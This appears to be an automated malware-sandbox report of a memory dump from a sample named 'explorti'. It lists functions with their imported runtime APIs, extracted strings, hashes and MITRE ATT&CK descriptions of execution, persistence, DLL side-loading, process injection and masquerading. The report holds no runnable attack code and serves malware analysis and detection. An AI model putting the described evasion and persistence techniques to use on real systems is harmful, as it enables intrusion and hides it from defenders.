Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: 'kTd+Y$@yT$d+Y
API String ID: 4078500453-4208207514
Opcode ID: 2918505d775dcfc5b1f805d9796c1a38feef77dadd7dfabca71abb0204c8b1a4
Instruction ID: bd88afcc97bfe0b6ae04e93c3998b51f0d628f96e6335d16141c1194a1b5e5c6
Opcode Fuzzy Hash: 2918505d775dcfc5b1f805d9796c1a38feef77dadd7dfabca71abb0204c8b1a4
Instruction Fuzzy Hash: C131E5B19047099BD720DF64D849AAABFE8FF58314F000A2EF945C7252E771EA54C7A1

Function 005670C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0056710B

Strings

.cmd, xrefs: 00567129
.com, xrefs: 0056714B
.exe, xrefs: 00567118
.bat, xrefs: 0056713A

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 09eb5883ddc01f6736136ebfe717377f1df2024c6304b03aed2b3e4d6819da4e
Instruction ID: c4da85544a5a95fd506564004086e2b2252701ec117b42ff92d3eb2914070954
Opcode Fuzzy Hash: 09eb5883ddc01f6736136ebfe717377f1df2024c6304b03aed2b3e4d6819da4e
Instruction Fuzzy Hash: 2A01A57760861A2676186419DC0263B1F9CBF87BB8715002BFD54F73C1DE55DC42C6A4

Function 00532E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00532F1F
__Mtx_unlock.LIBCPMT ref: 00532F8C
__Cnd_broadcast.LIBCPMT ref: 00532FA3
__Mtx_unlock.LIBCPMT ref: 005330B5
__Mtx_unlock.LIBCPMT ref: 0053315B

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 1ff63eea2f5db4f397fd0d55d645a998c59634d3460022d4805a78501a68df19
Instruction ID: 9daa25d47894d4a0f6d064c189ce16dd42a70388f7ecf324e7eeda10e4961ad9
Opcode Fuzzy Hash: 1ff63eea2f5db4f397fd0d55d645a998c59634d3460022d4805a78501a68df19
Instruction Fuzzy Hash: ECA1E1B0A01706AFDB11DF64C949BAABFB8FF55318F048529E815DB241EB35EA04CBD1

Function 00532670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00532806
___std_exception_destroy.LIBVCRUNTIME ref: 005328A0

Strings

P#S, xrefs: 00532811
P#S, xrefs: 005327BE, 00532899

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#S$P#S
API String ID: 2970364248-1326814652
Opcode ID: 8ad761b1387520125b814f26eed6738f94efa3bea2803db1c36e35f001a31c1a
Instruction ID: 3cc7ae3fe3c78d65178d7a1272bcfc954dcb46f3b4d876bed3fa71d3be7af3b0
Opcode Fuzzy Hash: 8ad761b1387520125b814f26eed6738f94efa3bea2803db1c36e35f001a31c1a
Instruction Fuzzy Hash: 60718F71E002099BDB04DFA8C885ADDFFB5FF59314F148119E805B7281EB74A944CBA5

Function 00532AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00532B23

Strings

P#S, xrefs: 00532B18
This function cannot be called on a default constructed task, xrefs: 00532B03
P#S, xrefs: 00532B2E

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#S$P#S$This function cannot be called on a default constructed task
API String ID: 2659868963-3752874884
Opcode ID: acd23f5d19380b432de10f2869bf89bd5afa3efba4f5372ad01ce1e0eea09651
Instruction ID: 67ccb8b18ae1df0b823d6037b9746bde60b4385315c6633802b76c4ccdee6b5a
Opcode Fuzzy Hash: acd23f5d19380b432de10f2869bf89bd5afa3efba4f5372ad01ce1e0eea09651
Instruction Fuzzy Hash: CBF0C27091020CABC710EFA8A84599ABFEDEF55304F5041AEF804A7201EB70AA48CB94

Function 00532440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0053247E

Strings

'kTd+Y, xrefs: 00532440
P#S, xrefs: 0053246D
P#S, xrefs: 00532486

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'kTd+Y$P#S$P#S
API String ID: 2659868963-2303812495
Opcode ID: 4f181eeb880b08e128dbb04be955a62e34c44fd06557f27a1f515df092becf49
Instruction ID: b4ab58d2b7e72ae784957f2498ce1dc4125a96c43fc10ebb87ff8bf59c010e07
Opcode Fuzzy Hash: 4f181eeb880b08e128dbb04be955a62e34c44fd06557f27a1f515df092becf49
Instruction Fuzzy Hash: 36F0E5B2D1030D6BCB14FBE8D805889BBECEE55300F008A25FA44E7940F770FA488BA1

Function 0056C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0056CA37

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: dcb76079a840842d0a1de2b1b375e41e8871643b63de17a5aa1476096a50e42b
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 27B139329002869FEB11CF68C895BBEBFE5FF95340F1485AAD899EB341D6349D41CB60

Function 0054BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0054BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0054BB14
_xtime_get.LIBCPMT ref: 0054BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0054BB43

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 669ddd414ef58d009565e43842354332a32ee7a83e203020d5aff40435385cb6
Instruction ID: 2f93d06465487767d2b42a44aaeecbaa082de676dc667c81c6b9f148d9d65530
Opcode Fuzzy Hash: 669ddd414ef58d009565e43842354332a32ee7a83e203020d5aff40435385cb6
Instruction Fuzzy Hash: AF212C75A0110AAFDF51EFA4DC459EEBFB8FF88718F000065F901A7261DB74AE059BA1

Function 00547040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 0054726C

Strings

@.S, xrefs: 00547250
`zT, xrefs: 00547282

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.S$`zT
API String ID: 3366076730-1159957634
Opcode ID: 1c3ac9c6346176f0b58fcef7549cd9beabc20e3d09555e396fbc1cdb08f76dac
Instruction ID: 8e3f6e19aa98b1417866fa5fcb306900ad94c367d21882ea82f25d2daadf4585
Opcode Fuzzy Hash: 1c3ac9c6346176f0b58fcef7549cd9beabc20e3d09555e396fbc1cdb08f76dac
Instruction Fuzzy Hash: 6FA136B4A01619CFDB21CFA8C88479EBBF0BF48714F18815AE819AB351E7759D01CF80

Function 0056F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0056F263

Strings

`'Y, xrefs: 0056F235
8"Y, xrefs: 0056F30B

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"Y$`'Y
API String ID: 3903695350-3597833648
Opcode ID: e90612cbb4a58b59a2b9e1fd189904bbce5761e26dfd850b2be0998a06154d3e
Instruction ID: 20a79415a537e1dbc7da07e117e33f36c3a93f393a5d06f8bf13d9ed2b1f217f
Opcode Fuzzy Hash: e90612cbb4a58b59a2b9e1fd189904bbce5761e26dfd850b2be0998a06154d3e
Instruction Fuzzy Hash: EB311D35A003069FEB21AB79ED49B5A7BE9BF80310F144839F456E7251DF71AC808F21

Function 00533930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00533962
__Mtx_init_in_situ.LIBCPMT ref: 005339A1

Strings

pBS, xrefs: 00533940

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pBS
API String ID: 3366076730-2610797707
Opcode ID: 284c3959019bd016de6baebef52e3d9ead4927c388e36eb0916f7b02a7104da1
Instruction ID: 0962448e7cd7dba5fd9a522a451023ccc26e2067a86ed9bf0ff6c9d569633f6d
Opcode Fuzzy Hash: 284c3959019bd016de6baebef52e3d9ead4927c388e36eb0916f7b02a7104da1
Instruction Fuzzy Hash: 564133B1601B05CFD720CF19C988B9ABBF0FF84315F148619E86A8B341E7B4EA05CB80

Function 00532520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00532552

Strings

P#S, xrefs: 0053255D
P#S, xrefs: 00532547

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#S$P#S
API String ID: 2659868963-1326814652
Opcode ID: a6ddb80344f003362ed81d0f8967156ec915dddf5e7a3f8688b602d0f6a3a7bd
Instruction ID: fb109e9d824399ff3413d1a513e401fd7c360f1eec462fc6a9c16392c67071c3
Opcode Fuzzy Hash: a6ddb80344f003362ed81d0f8967156ec915dddf5e7a3f8688b602d0f6a3a7bd
Instruction Fuzzy Hash: 0BF08271D1120DABCB14DFA8D84198EBFF4AF95304F1082AEE84567240EA715A58CB95

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

